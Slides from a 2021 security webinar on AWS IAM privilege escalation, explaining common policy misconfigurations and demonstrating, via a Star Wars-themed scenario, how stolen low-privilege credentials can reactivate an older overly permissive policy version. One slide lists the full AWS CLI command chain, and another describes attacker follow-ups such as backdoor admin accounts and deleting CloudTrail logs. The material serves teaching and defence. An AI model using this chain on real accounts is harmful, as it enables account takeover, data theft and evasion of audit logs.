Upgrade to Pro — share decks privately, control downloads, hide ads and more …

IAM Bad: Privilege Escalation using Misconfigured Policies in AWS IAM (Webinar)

IAM Bad: Privilege Escalation using Misconfigured Policies in AWS IAM (Webinar)

Slides from a webinar conducted on Star Wars Day, 2021.

The webinar was focused on a demo of a mis-configured AWS IAM policy that allows a user to gain administrative privileges within AWS.



May 06, 2021


  1. IAM Bad Privilege Escalation using Misconfigured Policies in AWS IAM

    Riyaz Walikar | Co-Founder - Kloudle | riyaz@kloudle.com May the 4th 2021 – 8:00 AM PDT (8:30 PM IST)
  2. Riyaz Walikar Co-founder & Chief Breaker of Things @ Kloudle

    Inc. Twitter: @riyazwalikar, Blog: https://ibreak.software • Over a decade of experience in breaking web & mobile apps, networks, wireless, cloud and most recently container and Kubernetes • Have led Product Security and Consulting teams at Citrix and PwC SDC in a past life and was the OffSec Lead at Appsecco before moving on to co-founding Kloudle • Have multiple certifications as a result of my learning curve over the years, including CKA, CKAD, OSCP, CREST etc. (also, because they look cool on LinkedIn ☺) • Speaker at multiple cons, co-author, trainer, security evangelist with a short attention span and attracted to all things shiny
  3. https://starwarsblog.starwars.com/wp-content/uploads/2021/04/disneyplus-star-wars-day-fan-art-takeover-7387930_TALL.jpg

  4. What is the webinar about? • What is an AWS

    IAM policy? • Common examples of a misconfigured or overly permissive policy • Demo of a misconfiguration within a policy that leads to privilege escalation. • Q&A
  5. What is an AWS IAM Policy • A policy is

    an object in AWS that, when associated with an identity or resource, defines their permissions. • AWS evaluates these policies when an IAM principal (user or role) makes a request. • Permissions in the policies determine whether the request is allowed or denied.
  6. An Example AWS IAM Policy

  7. Some examples of policy misconfigurations / permissive configurations

  8. Common misconfigurations with Policies • Usage of wildcard * not

    bound to Action or Resource
  9. Common misconfigurations with Policies • Usage of an “Action” that

    could lead to impersonation of another user
  10. Common misconfigurations with Policies • Multiple policy versions with overly

    permissive configuration for an older version
  11. Demo Multiple policy versions with overly permissive configuration for an

    older version
  12. Demo Assumptions and Goal • Because we are demonstrating privilege

    escalation, we work with the assumption that we have gained access to General Tarkin’s AWS credentials • These credentials appear to be non-privileged. • Our aim is to exploit a mis-configuration with the user’s policy definition and gain access to the employee database for the Death Star
  13. Identify who you are and if you have access

  14. List what user defined policies are attached to the user

  15. Get the policy’s current version number

  16. Get v6 policy json definition

  17. Get a list of available versions for the policy

  18. Get v1 definition of the policy

  19. Get v2 definition of the policy (and so on)

  20. Get v5 definition of the policy (and notice the privileges)

  21. Set v5 of the policy as the default policy

  22. Access Darth Vader’s Employee database

  23. Post privilege escalation? • With the kind of access you

    will get, explore what else is available within the AWS account • Attackers tend to focus on data theft/destruction and make an attempt to use resources for their own benefit (like crypto-mining) etc. • Some attackers create a shadow admin account and use this as a backdoor • To hide their traces within AWS, attacker may also remove AWS logs (CloudTrail, flowlogs etc.).
  24. Commands from the Demo aws rds describe-db-instances --profile <victim-profile-name> aws

    sts get-caller-identity --profile <victim-profile-name> aws iam list-attached-user-policies --user-name <victim-aws-user-name> --profile <victim-profile-name> aws iam get-policy --policy-arn "<arn-value-of-policy>" --profile <victim-profile-name> aws iam get-policy-version --policy-arn "<arn-value-of-policy>" --version-id v6 --profile <victim- profile-name> aws iam list-policy-versions --policy-arn "<arn-value-of-policy>" --profile <victim-profile-name> aws iam get-policy-version --policy-arn "<arn-value-of-policy>" --version-id v1 --profile <victim- profile-name> aws iam get-policy-version --policy-arn "<arn-value-of-policy>" --version-id v2 --profile <victim- profile-name> aws iam get-policy-version --policy-arn "<arn-value-of-policy>" --version-id v4 --profile <victim- profile-name> aws iam get-policy-version --policy-arn "<arn-value-of-policy>" --version-id v5 --profile <victim- profile-name> aws iam set-default-policy-version --policy-arn "<arn-value-of-policy>" --version-id <version-with- excessive-privs> --profile <victim-profile-name> aws rds describe-db-instances --profile <victim-profile-name>
  25. Image credits • https://pngimg.com/uploads/stormtrooper/stormtrooper_PNG11.png • https://thenounproject.com/term/darth-vader/65913/ • https://starwars.fandom.com/wiki/Wilhuff_Tarkin

  26. Q&A Site: https://kloudle.com Blog: https://kloudle.com/blog Twitter: - @kloudleinc - @riyazwalikar

    Reach us at: riyaz@kloudle.com